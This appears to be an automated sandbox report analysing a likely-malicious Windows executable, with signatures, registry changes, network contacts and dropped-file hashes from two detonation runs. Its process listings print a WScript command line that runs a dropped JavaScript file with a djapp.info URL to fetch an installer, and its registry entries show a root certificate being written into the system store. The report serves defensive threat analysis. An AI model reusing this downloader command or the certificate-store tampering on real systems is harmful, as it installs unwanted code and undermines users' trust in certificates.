Analysis Overview
SHA256
6a9cd19d6462fd3716543527db8365343fd78ee86c9068eb0acf108cc160ef94
Threat Level: Likely malicious
The file a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies system certificate store
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 15:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 15:44
Reported
2024-06-13 15:46
Platform
win7-20231129-en
Max time kernel
120s
Max time network
128s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | C:\Windows\SysWOW64\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 | C:\Windows\SysWOW64\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | C:\Windows\SysWOW64\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 | C:\Windows\SysWOW64\WScript.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf143C.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf143C.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.19.116.195:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 3.19.116.195:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 172.67.70.191:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf143C.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HXCD4I85\domain_profile[1].htm
| MD5 | f322673fd5cbe9d3f5ddbecb281ff8c3 |
| SHA1 | 11b08663c1310e97b60fa4ababaac33377cf8cfe |
| SHA256 | 3331db507ad03cb8d608ca304a6b6de793d803fbd24ed83999e5ce90b76409cf |
| SHA512 | e98c790c317589e79033ca5e7fd850f1ce602b05c20a922685bf730578130813b07eed04c95760d0277dfd53f7e5c699104039d905cc1aac79c1a1a3c489e7e1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\56O2B4T6.txt
| MD5 | 521ff7fa501580f5c7503261fcdcb76a |
| SHA1 | 89fb0f3cb693c136d7685e4f0199704debe8aa27 |
| SHA256 | 02de0cbae2ba931ef16218d4dbb3dfd8b0bbf0be6543047a29dd462013defc79 |
| SHA512 | 5850f25c0a906079e4db7e41c3019340ead6cf0f39504e5a9e5a702483e8e451bc8cb5b9778e66712d093a75da7cdc2cd65324ff69e3c2129a62949635ec98c4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | f8aa1a291d20db704aff8dcc99c0782f |
| SHA1 | 52ce8f8661c98ed78ce5e778da3ee0a6063eee0d |
| SHA256 | 67e07cd7b225a0c1e39e6977f6c9605db430dc8bc953f619b8e6576c0bbc7d0e |
| SHA512 | ad9c5756b501c2ab332eed9f82a3d8ab1efa36c1163bf875a249071ebc3ca12866c470396b42510f73a86117d56e074bdb4e82e55d8ce14f7028168a5a350cc1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 3d0ece762b3cbb49d3c5c972b3a09a37 |
| SHA1 | 73847adbffd52f3fc0745de4395268d656023cfa |
| SHA256 | e3cb8ee67bedb166281cea7b9a2b3dc1f1a76165b92f19ed8c73fe49485e1877 |
| SHA512 | f854ae4f95460b42de3bba20628b41aef63bcd8d2c7e9f3d749658bb364929ac24c325490812955f3d3d83a7eed43586f678b8dcbab9c0be2d2dc354e9bf76c7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fd12e7c88822109ca9d393703976240 |
| SHA1 | 8d4b3867029977ee05c62db281b17ce95a3d09c3 |
| SHA256 | 1b5272b12fd042a6eaf21c44b7c7687f3a7d4b738751bd5bb1fc8d817d714a0e |
| SHA512 | 11b0fd218b677165aa40acafb6a5500c440ab3036f97bb70a53a0da52f32c7edc1585a76e234c5bd02432921537963d2f69c302d10f0b6856e3241cafe8c704d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 4918c5a2d8e688234fced94d1d1cd531 |
| SHA1 | b4ee573c28a3862dd47390d7ca976df8a50e28e5 |
| SHA256 | aced6f4c8bcc408fa15ebc19f62a50b308d6f4abc8e2b35ba460c6d0f5882e27 |
| SHA512 | c7ad23310e2ce8c003ac751ccb8008099a3e9ff1319ff8bb63637243cfcbe2bc3c6d1fc2c9d4f0723090b8660c058e9269cb98d2d1a6264bc08dce1c8ad626a3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 619073583c805bb48bfcb0b19388d373 |
| SHA1 | 60f3675ea0b818bf30afa0926e83aceaafe31716 |
| SHA256 | cc362847041a170411418419d7afbf9196c677eb0f2a6856b42a6f98b0f4ba8d |
| SHA512 | 0cc3ff3b0b57859255b5df5f1f9f08b1597aabcaaddee2fddca262b4f54a81b87162675a4906b1aa0df0dd85846d34786783f663a100cca84735f9b6a870f4b0 |
C:\Users\Admin\AppData\Local\Temp\Tar5C35.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ETUT5CMR\domain_profile[1].htm
| MD5 | fc20af50443c71b4c696d726253d52e6 |
| SHA1 | 5e77a9412417c819b9f521c66c107c68a0cf98f7 |
| SHA256 | b90dc42e20be3dc6f1e2813b0aaf81d4510b433cf4f70a7696538741dd931538 |
| SHA512 | 503e7fd43a6449128dc004a7a0479fcb398883cd5d8c39f22c7b7828432ee916f7a24474428514bc099de8b9fcdd77408f1697634862c5c5ae40a86eebe20218 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HXCD4I85\domain_profile[1].htm
| MD5 | 2a8ea6aa9e904370f4f6e0c53b878e97 |
| SHA1 | db546660c61de56e3ec5876ada59d583dafa082b |
| SHA256 | 7f91bfda442d910f504bc7ce9b8510acca0c87e1adcb4723ea09dfb9c0ff6e9f |
| SHA512 | c5f8c87a02a8c070a89141b3f3cbe0b17fee3d81b816e2285d6a6b96f998d31588d8133afb73fd3098fec7b5515511a94016513262d7f3e5f939d81d7b67f294 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ETUT5CMR\domain_profile[1].htm
| MD5 | c9bf8b8bb75fe723867c0e5138b8830f |
| SHA1 | b70c842600a25ad3c55c011c592572d03ac77377 |
| SHA256 | e00d8bcd7c432dc69fb9a1d6ce5894cfde8612686a3a041e24dafab097cac8c2 |
| SHA512 | 29fc67115e3fd4ed20dcbd9890ce73ce19f2f291572502274ea4ea339992586c3e0b4d4e9bf2de53c607aca6abaf09e583bd41590675ab3a0981f265895fad13 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 15:44
Reported
2024-06-13 15:46
Platform
win10v2004-20240611-en
Max time kernel
124s
Max time network
128s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a652a09e98593e6ea054a28cbec33fb0_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4224,i,3833046924978547022,12404847742964713612,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:8
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.251:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 23.253.130.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fufF50E.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |